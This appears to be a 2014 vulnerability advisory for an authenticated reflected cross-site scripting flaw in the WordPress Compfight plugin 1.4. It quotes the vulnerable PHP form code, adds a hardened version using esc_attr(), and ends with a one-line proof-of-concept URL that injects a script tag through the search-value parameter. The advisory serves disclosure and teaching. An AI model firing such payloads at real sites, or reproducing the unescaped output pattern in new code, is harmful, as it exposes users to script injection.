WordPress Compfight <= 1.4 Authenticated Reflected XSS Vulnerability

######################
# Exploit Title : WordPress Compfight 1.4 Authenticated Cross Site Scripting

# Exploit Author : Claudio Viviani - HomeLab IT

# Vendor Homepage : http://wordpress.org/plugins/easy-banners/

# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip

# Date : 2014-07-03

# Tested on : Windows 7 / Mozilla Firefox

######################

# Location : http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

    // $search_value is populated from the search-value GET parameter (assignment not shown)
    if (!$search_value) {
        $input_text = 'Enter Keyword(s)';
    } else {
        $input_text = $search_value;
    }

    if ($show_title) {
        $output .= '<h3 class="cf_search_title">Compfight</h3>';
        $output .= '<p class="cf_search_subtitle">Locate the visual inspiration<br/>you need. Super fast!</p>';
    }

    $output .= '<form method="GET" action="" id="cf-form">';
    // $input_text is concatenated straight into the value attribute, with no escaping
    $output .= '<input type="text" name="search-value" id="search-value" value="' . $input_text . '" onClick="javascript:if(this.value==\'Enter Keyword(s)\') { this.value = \'\'; };" />';
    $output .= '<input type="submit" name="search" id="search" value="Search" class="button" />';
    $output .= '</form>';

The $input_text variable, which carries the user-supplied search-value parameter, is written into the value attribute of the input element without being sanitized or escaped, so a quote character in the parameter closes the attribute and the rest of the input is rendered as markup.
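The following is an added example and not the plugin's own code: it reproduces the form rendering from the advisory with the one fix a maintainer would apply, escaping the user-controlled value for an HTML attribute context. In WordPress that is esc_attr(); because esc_attr() only exists inside WordPress, the example defines an equivalent fallback (htmlspecialchars with ENT_QUOTES) so it also runs from the command line. The wrapper function name cf_render_search_form() and the assumption that $search_value comes from $_GET['search-value'] are mine, not the plugin's.

```php
<?php
// Added example (not the Compfight plugin's code): hardened version of the
// search-form output shown in the advisory.

// Fallback for running outside WordPress. Inside WordPress esc_attr() is
// always defined and this block is skipped. ENT_QUOTES encodes both ' and ",
// which is what an attribute value needs.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Hypothetical wrapper around the advisory's rendering code.
function cf_render_search_form($search_value, $show_title = true) {
    $output = '';

    if (!$search_value) {
        $input_text = 'Enter Keyword(s)';
    } else {
        $input_text = $search_value;
    }

    if ($show_title) {
        $output .= '<h3 class="cf_search_title">Compfight</h3>';
        $output .= '<p class="cf_search_subtitle">Locate the visual inspiration<br/>you need. Super fast!</p>';
    }

    $output .= '<form method="GET" action="" id="cf-form">';
    // Fixed line: the user-controlled value is escaped for the attribute
    // context, so quotes and angle brackets in it can no longer break out of
    // value="...".
    $output .= '<input type="text" name="search-value" id="search-value" value="' . esc_attr($input_text) . '" onClick="javascript:if(this.value==\'Enter Keyword(s)\') { this.value = \'\'; };" />';
    $output .= '<input type="submit" name="search" id="search" value="Search" class="button" />';
    $output .= '</form>';

    return $output;
}

// Assumption: the plugin reads the value from the search-value GET parameter.
// When run from the CLI there is no request, so a constructed sample value
// containing a quote and angle brackets is used instead.
$search_value = isset($_GET['search-value']) ? $_GET['search-value'] : '"><b>sample</b>';

echo cf_render_search_form($search_value), PHP_EOL;
```

Run with `php example.php` and inspect the output: the double quote and angle brackets from the sample value appear as `&quot;`, `&lt;` and `&gt;` inside the value attribute, so the attribute is never closed early. Escaping at the point of output, in the encoding that matches the context (attribute here), is the fix; stripping or blacklisting characters on input is not a substitute.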

######################

Exploit Code:

http://localhost/plugins/compfight/compfight-search.php?search-value='"/><script>alert(1);</script>&search=Search
#####################

Discovered By : Claudio Viviani
        http://www.homelab.it
        info@homelab.it

        https://www.facebook.com/homelabit
        https://twitter.com/homelabit
        https://plus.google.com/+HomelabIt1/
        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################